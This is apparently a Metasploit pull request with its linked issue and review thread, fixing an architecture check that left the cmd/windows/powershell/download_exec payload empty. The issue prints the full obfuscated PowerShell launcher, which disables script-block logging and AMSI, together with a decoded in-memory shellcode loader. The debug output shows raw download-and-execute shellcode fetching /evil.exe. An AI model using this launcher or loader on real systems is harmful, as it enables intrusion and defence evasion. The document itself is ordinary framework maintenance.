### PR TITLE
Fix empty cmd/windows/powershell/download_exec payload

### LINKED ISSUE #18607: `cmd/windows/powershell/download_exec` generates incorrect payload
## Steps to reproduce

```
$ msfvenom -p cmd/windows/powershell/download_exec 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 3728 bytes
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c  $gaR=((''{1}n''+''abl{0}''+''{''+''3}cri''+''p''+''{2}BlockLogging'')-f''e'',''E'',''t'',''S''); $aTGz=((''Ena{0}le{1}c''+''{4''+''}i{''+''5}tBlock{3''+''}n{''+''2}ocationL''+''og''+''ging'')-f''b'',''S'',''v'',''I'',''r'',''p'');If($PSVersionTable.PSVersion.Major -ge 3){ $xF7=[Collections.Generic.Dictionary[string,System.Object]]::new(); $ogLcl=[Ref].Assembly.GetType(((''{''+''6}''+''{4}st''+''e''+''m.{''+''5''+''}''+''{''+''9''+''}n{''+''9''+''}''+''{3}em''+''ent.{8}{''+''1}t{''+''7}m{9}t''+''i{''+''7}n.{''+''8}m''+''si{2}ti{0}s''+'''')-f''l'',''u'',''U'',''g'',''y'',''M'',''S'',''o'',''A'',''a'')); $oGmr=((''Scri{0}t''+''B{1}''+''oc{2''+''}Logging''+'''')-f''p'',''l'',''k''); $hd=[Ref].Assembly.GetType(((''{1}ystem.{4}ana{2}''+''eme''+''nt.{0}{3}''+''tomation''+''.''+''Uti''+''{5}''+''s'')-f''A'',''S'',''g'',''u'',''M'',''l'')); if ($ogLcl) { $ogLcl.GetField(((''''+''am''+''{''+''3}i{0}{''+''4}i{2}{1''+''}ai''+''le''+''d''+'''')-f''I'',''F'',''t'',''s'',''n''),''NonPublic,Static'').SetValue($null,$true); }; $rI=$hd.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($rI) { $v43=$rI.GetValue($null); If($v43[$oGmr]){ $v43[$oGmr][$aTGz]=0; $v43[$oGmr][$gaR]=0; } $xF7.Add($aTGz,0); $xF7.Add($gaR,0); $v43[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$oGmr]=$xF7; } Else { [Ref].Assembly.GetType(((''S{5}s''+''tem.''+''Manag''+''emen''+''t.{2}{1}tomation.''+''Sc{3}ipt{0''+''}''+''{4}o''+''ck'')-f''B'',''u'',''A'',''r'',''l'',''y'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAMPjcWUCA71W227bOBB9L9B/IAoBogBZc{1}piUwQoUMdp0izq1IhyaVc1CkYa2Ywp0iUp{2}0a3/75DXWynsYvsAl2+WCRnhsMzZw6dlzK1XEnCB9MbSb4/f0aaMWSaFYR6d9ch8djp3VQF601vkV2V5A2hSW82O1YF43{1}0eNgvtQZp63l0CrZnDBS3goOhAfmb3E{2}AQ+fj7R2klnwn3tfoVKhb{1}hqzZZ+lEyCdnszc3geVMpdaFM8Et9T/8sUPks7eKHr3rWTCUD9eGgtFlAnhB+RH4A68X''+''M6A+gOe''+''amVUbqMbLvdfRlfSsBzOMdocBm''+''AnKjM+XmZ9HQ221LK+''+''lQtTG1EfP4dapb0s02CMH5LEHZCMR''+''m''+''9p0p{2}+UUrLC4jOpAWtZjHoOU/BRO+ZzARcQD5Cr9hqLsejIECzuZoC9WQpREj+TRh6Dvctdk91optOaDW0Ogi{2}plvuOVBZKaD29LckijwIcKy4gPj9cBDmLYEWr7ewZ73QjqTaAUyYDpXhlesb0g3{1}A''+''I9mVuklTr1LXUIwWsFNPH4RPjXWXuuIbosDXEiuFc9Ga/cHpfeKr/PPzmg3kY8h5{2}KOl5IVPG25SrfVA3IBFRpRa3aO+VG/2YDs''+''GASMmXUIO1o8cntXcLvyPSq5yED3Uqypwayw3MHDZOqiUf9MDqBA6Oo58tTLsUOgtW66Ytme7uZo5PcFMyYkw{2}{1}bNA1{1}DE{2}AFpKeNLzZ6pVWVZ/+Ot1BKS{2}PmbFtuFHwE5zNsX0ljdVlikVFCC7jGaScCYdISN7zDI6WMR+3{2}/tb8egzIbBzMNIc64E''+''rDofYOqpozBRpEUQ{2}2LNi{1}qBAi0owTgQbozw03VE{2}i40h83ek2TZBzXiHSwvI''+''Rp{1}Y7FgoG5{1}rri3Kj8N4cfAfMngsOlUqfQ1NYWjbWcnR0jrye/efHD8bcCootEUYTrQqjpiBP17V8k{1}fvEDX5IpLu/9y5LG566vnz7ypze2fG{2}F2qcaAaTNhAiOjHLS1PVH6pOnwoeLO''+''g9L6qZiCliBQXVF/W1R6QqjUKQyKAWpbrThOAK/OqqS2fQVkZRisdaddOjz8C5NEnO8/RR9Aju0k7C7''+''2u10UjO6i+6oC9OkX66vZkmKo0AlODUwdWlShMRrPCaX/A1L4rFjk+C6sdsGGR0+RktghNVUceEdKiU3o2nutmLCGDjHbw5sn7j1BgqB''+''7B74Rzzq13VRvz969/nzwmznTUH6CP9mvObNe+8Xuk3jUDRt0Hq0/XNiQit8{1}wQ3jFk1j7F4B9VuyDYmmUTZKXNUHOyFvhvt39bG0nXN8rSv5+AdR9H/W2AkAAA''+''{0}{0}'')-f''='',''J'',''x'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
```

The embedded Powershell command is 
```
H4sIAMPjcWUCA71W227bOBB9L9B/IAoBogBZcJpiUwQoUMdp0izq1IhyaVc1CkYa2Ywp0iUpx0a3/75DXWynsYvsAl2+WCRnhsMzZw6dlzK1XEnCB9MbSb4/f0aaMWSaFYR6d9ch8djp3VQF601vkV2V5A2hSW82O1YF43J0eNgvtQZp63l0CrZnDBS3goOhAfmb3ExAQ+fj7R2klnwn3tfoVKhbJhqzZZ+lEyCdnszc3geVMpdaFM8Et9T/8sUPks7eKHr3rWTCUD9eGgtFlAnhB+RH4A68XM6A+gOeamVUbqMbLvdfRlfSsBzOMdocBmAnKjM+XmZ9HQ221LK+lQtTG1EfP4dapb0s02CMH5LEHZCMRm9p0px+UUrLC4jOpAWtZjHoOU/BRO+ZzARcQD5Cr9hqLsejIECzuZoC9WQpREj+TRh6Dvctdk91optOaDW0OgixplvuOVBZKaD29LckijwIcKy4gPj9cBDmLYEWr7ewZ73QjqTaAUyYDpXhlesb0g3JAI9mVuklTr1LXUIwWsFNPH4RPjXWXuuIbosDXEiuFc9Ga/cHpfeKr/PPzmg3kY8h5xKOl5IVPG25SrfVA3IBFRpRa3aO+VG/2YDsGASMmXUIO1o8cntXcLvyPSq5yED3Uqypwayw3MHDZOqiUf9MDqBA6Oo58tTLsUOgtW66Ytme7uZo5PcFMyYkwxJbNA1JDExAFpKeNLzZ6pVWVZ/+Ot1BKSxPmbFtuFHwE5zNsX0ljdVlikVFCC7jGaScCYdISN7zDI6WMR+3x/tb8egzIbBzMNIc64ErDofYOqpozBRpEUQx2LNiJqBAi0owTgQbozw03VExi40h83ek2TZBzXiHSwvIRpJY7FgoG5Jrri3Kj8N4cfAfMngsOlUqfQ1NYWjbWcnR0jrye/efHD8bcCootEUYTrQqjpiBP17V8kJfvEDX5IpLu/9y5LG566vnz7ypze2fGxF2qcaAaTNhAiOjHLS1PVH6pOnwoeLOg9L6qZiCliBQXVF/W1R6QqjUKQyKAWpbrThOAK/OqqS2fQVkZRisdaddOjz8C5NEnO8/RR9Aju0k7C72u10UjO6i+6oC9OkX66vZkmKo0AlODUwdWlShMRrPCaX/A1L4rFjk+C6sdsGGR0+RktghNVUceEdKiU3o2nutmLCGDjHbw5sn7j1BgqB7B74Rzzq13VRvz969/nzwmznTUH6CP9mvObNe+8Xuk3jUDRt0Hq0/XNiQit8JwQ3jFk1j7F4B9VuyDYmmUTZKXNUHOyFvhvt39bG0nXN8rSv5+AdR9H/W2AkAAA==
```

which decodes to
```
function iMkWn {
        Param ($jV, $aGjko)
        $xdUu = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

        return $xdUu.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($xdUu.GetMethod('GetModuleHandle')).Invoke($null, @($jV)))), $aGjko))
}

function x8 {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $iR,
                [Parameter(Position = 1)] [Type] $x7 = [Void]
        )

        $m_vY = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $m_vY.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $iR).SetImplementationFlags('Runtime, Managed')
        $m_vY.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $x7, $iR).SetImplementationFlags('Runtime, Managed')

        return $m_vY.CreateType()
}

[Byte[]]$wX = [System.Convert]::FromBase64String("")
[Uint32]$av = 0
$ktftJ = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iMkWn kernel32.dll VirtualAlloc), (x8 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wX.Length,0x3000, 0x04)

[System.Runtime.InteropServices.Marshal]::Copy($wX, 0, $ktftJ, $wX.length)
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iMkWn kernel32.dll VirtualProtect), (x8 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($ktftJ, [Uint32]$wX.Length, 0x10, [Ref]$av)) -eq $true) {
        $tj8Y7 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iMkWn kernel32.dll CreateThread), (x8 @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ktftJ,[IntPtr]::Zero,0,[IntPtr]::Zero)
        [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iMkWn kernel32.dll WaitForSingleObject), (x8 @([IntPtr], [Int32]))).Invoke($tj8Y7,0xffffffff) | Out-Null
}
```

## Expected behavior

In the line:
```
[Byte[]]$wX = [System.Convert]::FromBase64String("")
```
the argument for the `FromBase64String` function should be a base64 encoded shellcode

## Current behavior

The argument for the `FromBase64String` is an  empty string

### Metasploit version

```
msf6 > version
Framework: 6.3.46-dev-
Console  : 6.3.46-dev-
```

### PR DESCRIPTION
**Pull request by adfoster-r7**
Fix a bug in `cmd/windows/powershell/download_exec` which caused empty payloads to be generated

Closes https://github.com/rapid7/metasploit-framework/issues/18607

## Debugging Notes

Adding this debug line:

```
diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb
index 0a7295d6ef..a28fb2ea9d 100644
--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -386,6 +386,8 @@ server_host:
 end:
 EOS
     self.assembly = payload_data
-    super
+    result = super
+    $stderr.puts "Generated: #{result}"
+    result
   end
 end
```

Shows the unadapted payload works:

```
msf6 payload(windows/download_exec) > generate -f raw
Generated: ??`??1?d?R0?R
?8?u?}?;}$u?X?X$?f??H?X ??<I?4??1?1????|, ??
                   K?XӋ?ЉD$$[[aYZQ??X_Z??]hnethwini??ThLw&??1?WWWWVh:Vy????c[1?QQjQQh?SPhW??????OY1?Rh2??RRRQRPh?U.;?Չ?j[h?3??jPjVhuF????1?WWWWVh-{?Յ?uK?z???????/evil.exe?k1?_PjjPjjWh???O?Փ1?f?)?T?L1??PQVh????Յ?t-X??tjTP?D$
                                                                 PSh-W?[?Ճ???ShƖ?R??jWh1?o???jh?V??????rund11.exe????localhost
??`??1?d?R0?R
?8?u?}?;}$u?X?X$?f??H?X ??<I?4??1?1????
                   K?XӋ?ЉD$$[[aYZQ??X_Z??]hnethwini??ThLw&??1?WWWWVh:Vy????c[1?QQjQQh?SPhW??????OY1?Rh2??RRRQRPh?U.;?Չ?j[h?3??jPjVhuF????1?WWWWVh-{?Յ?uK?z???????/evil.exe?k1?_PjjPjjWh???O?Փ1?f?)?T?L1??PQVh????Յ?t-X??tjTP?D$
                                                                 PSh-W?[?Ճ???ShƖ?R??jWh1?o???jh?V??????rund11.exe????localhost
```

But the adapter doesn't:

```
msf6 payload(cmd/windows/powershell/download_exec) > generate -f raw
Generated: 
```

This is because the adapted payload arch is identified as `["cmd"]`, so it doesn't convert the ASM payload correctly:

```
[9] pry(#<#<Class:0x00007fe1cfc73928>>)> whereami

From: /Users/user/Documents/code/metasploit-framework/lib/msf/core/payload.rb:652 Msf::Payload#build:

    647:     # Assemble the payload from the assembly
    648:     a = self.arch
    649:     if a.kind_of? Array
    650:       a = self.arch.first
    651:     end
 => 652:     cpu = case a
    653:       when ARCH_X86    then Metasm::Ia32.new
    654:       when ARCH_X64    then Metasm::X86_64.new
    655:       when ARCH_PPC    then Metasm::PowerPC.new
    656:       when ARCH_ARMLE  then Metasm::ARM.new
    657:       when ARCH_MIPSLE then Metasm::MIPS.new(:little)
    658:       when ARCH_MIPSBE then Metasm::MIPS.new(:big)
    659:       else
    660:         elog("Broken payload #{refname} has arch unsupported with assembly: #{module_info["Arch"].inspect}")
    661:         elog("Call stack:\n#{caller.join("\n")}")
    662:         return ""
    663:       end
    664:     sc = Metasm::Shellcode.assemble(cpu, asm).encoded

[10] pry(#<#<Class:0x00007fe1cfc73928>>)> self.arch
=> ["cmd"]
```

## Verification

Verify that the steps in https://github.com/rapid7/metasploit-framework/issues/18607 work

### CODE REVIEW

File: lib/msf/core/payload.rb [hunk 1]
```diff
@@ -644,7 +645,7 @@ def build(asm, off={})
     end
 
     # Assemble the payload from the assembly
-    a = self.arch
+    a = opts[:arch] || self.arch
```
Comment (adfoster-r7) [inline lib/msf/core/payload.rb:648]: It looks like the original adapted arch is passed i from `opts`, so this is:

```
[1] pry(#<#<Class:0x00007fab4c96f308>>)> opts
=> {:arch=>"x86"}
```

But I also had this line as this previously, similar to the pattern over [here](https://github.com/rapid7/metasploit-framework/blob/453c8d8d6986934a3b869733fa1d01eaaa1fbbb0/lib/msf/util/payload_cached_size.rb#L142-L145)

```
    a = module_info["AdaptedArch"] || self.arch
```

From a quick look, it seems like there's other references in this file too that use `self.arch`, which might also be wrong

Does anyone have any preferences on the chosen approach here?

Comment (smcintyre-r7) [reply lib/msf/core/payload.rb:648]: I think the way it is currently is correct. `self.arch` is the architecture of the over all payload which would be ARCH_CMD in the case of `cmd/windows/powershell/download_exec` but at this point, it needs to be ARCH_X86 as specified in the options from the caller. This is the pattern I took in #16579. :+1:

**Comment by smcintyre-r7** [comment]
# Release Notes
This fixes an issue in the `cmd/windows/powershell/download_exec` payload module that was preventing it from executing correctly due to an architecture check.

**Review by smcintyre-r7 — COMMENTED** [review]
I was able to reproduce the original issue and validate that the proposed changes fix it :+1:
